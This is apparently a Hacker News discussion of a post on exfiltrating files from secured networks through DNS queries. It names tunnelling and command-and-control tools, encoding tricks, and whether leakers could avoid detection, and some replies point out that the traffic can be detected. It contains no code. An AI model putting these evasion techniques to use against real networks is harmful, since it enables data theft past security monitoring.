
Exfiltrate Files with DNS Queries - 16s
http://16s.us/dns
======
X-Istence
Dan Kaminsky a couple of years ago did a talk about this, as well as using DNS
to cache files...

[http://byteworm.com/2010/10/27/free-content-delivery-
network...](http://byteworm.com/2010/10/27/free-content-delivery-network-
using-dns-cache/)

Exfiltrating using DNS, or VPN over DNS and the various other techniques are
not new.

They do show how difficult it is to police data from leaving ones network.

~~~
16s
This is an actual working example, not theory on how to do it. IMO, that's
what makes it significant. Lot's of people talk about how this can be done,
few show actual working examples (with source code) that others can re-create
on their networks.

~~~
cypherpunks01
Sorry to rain on your parade, but Dan Kaminsky additionally wrote an
implementation called ozymandns in 2005 or so:

[http://dnstunnel.de/](http://dnstunnel.de/)

I use it when I need an ssh or web connection in extremely hostile
environments that only allow free DNS queries out, like some planes, buses,
establishments, etc.

There are also links to other implementations here:
[http://en.cship.org/wiki/OzymanDNS](http://en.cship.org/wiki/OzymanDNS)

~~~
16s
Those examples tunnel traffic over DNS. They do not specifically break large
files up into small chunks and exfiltrate them off of a secure network with
simple DNS queries.

~~~
cypherpunks01
Sure, yes. All those examples (ozyman, iodine, etc.) tunnel arbitrary traffic
over DNS, whereas yours is more traffic-efficient in essentially being a
static file server via DNS, I suppose?

------
dgl
This seems to use base64, DNS is case insensitive so really it should use
base32 or some other encoding scheme. However DNS is usually case preserving
so it will likely work.

Unless the recursive nameserver in use happens to implement this hack for
improved security: [http://tools.ietf.org/html/draft-vixie-dnsext-
dns0x20-00](http://tools.ietf.org/html/draft-vixie-dnsext-dns0x20-00)

~~~
dfc
Supported in Unbound with `use-caps-for-id`
[http://www.unbound.net/documentation/unbound.conf.html](http://www.unbound.net/documentation/unbound.conf.html)

I love unbound.

------
bryogenic
Don't just get files, use DNS for Command and Control too.

[http://blog.strategiccyber.com/2013/06/06/dns-command-and-
co...](http://blog.strategiccyber.com/2013/06/06/dns-command-and-control-
added-to-cobalt-strike/)

~~~
raffi
After I wrote that blog post, I also added the ability to tunnel traffic
through Beacon when its checking in several times each second. Recently, I
added the ability for it to download a large file, a piece at a time, with
each checkin. The size of the piece depends on the data channel (DNS vs.
HTTP). It's all encrypted too.

\- [http://blog.strategiccyber.com/2013/06/20/thatll-never-
work-...](http://blog.strategiccyber.com/2013/06/20/thatll-never-work-we-dont-
allow-port-53-out/)

\- [http://blog.strategiccyber.com/2013/07/09/hacking-
through-a-...](http://blog.strategiccyber.com/2013/07/09/hacking-through-a-
straw-pivoting-over-dns/)

Cobalt Strike is a commercial tool, so it better include the bells and
whistles. The OP does a good job of showing code that anyone can play with,
right now.

Dan Kaminsky's BlackHat presentations on OzymanDNS are excellent as well.

~~~
16s
I really like your blog post and your ideas.

With new versions of BIND 10 allowing Python scripting, PowerDNS with Lua
scripting and Unbound with Python, I think we'll start seeing more corps
controlling DNS queries (or attempting to do so) with whitelists/blackslists,
but for the time being, things are mostly wide-open.

------
agnokapathetic
The author of sqlmap added DNS exfiltration for blind SQL injection last year.
Really creative technique (DNS stack doubled the size of sqlmap code-base).

Paper:
[http://arxiv.org/pdf/1303.3047.pdf](http://arxiv.org/pdf/1303.3047.pdf)

Slides: [http://www.slideshare.net/stamparm/dns-exfiltration-using-
sq...](http://www.slideshare.net/stamparm/dns-exfiltration-using-
sqlmap-13163281)

------
gwu78
8 bytes at a time.

Wouldn't that mean 100's, 1000's or 10's of thousands of requests for
nonsensical subdomains of the same domain name (and that domain name is
probably a silly one if you got it recently for 10 bucks).

This is not anomalous DNS traffic? My imagination just does not stretch this
far. If the title was just "Transfer a file via DNS", maybe I could play
along.

I think nstx preceded iodine.

Here's another one no one has mentioned yet:

[http://www.skullsecurity.org/wiki/index.php/Dnscat](http://www.skullsecurity.org/wiki/index.php/Dnscat)

What I'd really like to see is an implementation of lcamtuf's old, pre-
cloud/dropbox idea: daemon caches, specifically recursive DNS caches, as free,
(temporary) distributed storage. Anyone can store data for free on 100's of
1000's of networked computers worldwide, otherwise known as recursive DNS
caches. Currently we only store "domain names" on these servers, but as the OP
shows, it's possible to encode more information into requests than just domain
names.

Imagine if the encoded data was an image. With most recursive DNS servers, the
data expires upon the TTL expiry. Snapchat via DNS.

------
ryan-c
This is a hack of mine that stores files in public DNS caches. It's a
horrible, hack and slow but it does work.

[https://github.com/ryancdotorg/dnsstore](https://github.com/ryancdotorg/dnsstore)

~~~
gwu78
Some caches, like dnscache (and thus OpenDNS), may not respond to non-
recursive queries. Would this break your dns_peek function?

~~~
ryan-c
Correct, it requires the cache to respond to queries with the recursion bit
disabled.

It will also probably behave in "interesting" ways when run against a resolver
that's on an anycast IP and doesn't synchronize.

------
malandrew

        "When/if the network security team figures this out and 
        blocks it, I'll demonstrate a few other ways in which data 
        can be exfiltrated."
    

I loved this line.

He mentions blocking there, but given the technique, could forensics show that
this has been used? For example, could some future whistleblower for a
national security agency (ours or anyone else's for that matter) use this to
exfiltrate files without risk of discovery after the fact?

Could an organization like wikileaks or the guardian use this as a technique
for whistleblowers to leak files safely?

~~~
16s
In a well-monitored environment, it should draw attention and cause them to
investigate the internal host making the queries.

------
contingencies
People have been doing covert channels over DNS in the wild since <2001\. Fast
forward 12 years, and this is the new 'my first socket app'.

------
sg2342
there was a related talk [1] at the usenix 2013 in which this (quite old i
might add) method of information ex-filtration was analyzed.

bottom line: amateurs get caught.

[1]
[https://www.usenix.org/conference/usenixsecurity13/practical...](https://www.usenix.org/conference/usenixsecurity13/practical-
comprehensive-bounds-surreptitious-communication-over-dns)

------
malandrew
Could gifsockets be used to exfiltrate a file as well?

[https://github.com/videlalvaro/gifsockets](https://github.com/videlalvaro/gifsockets)

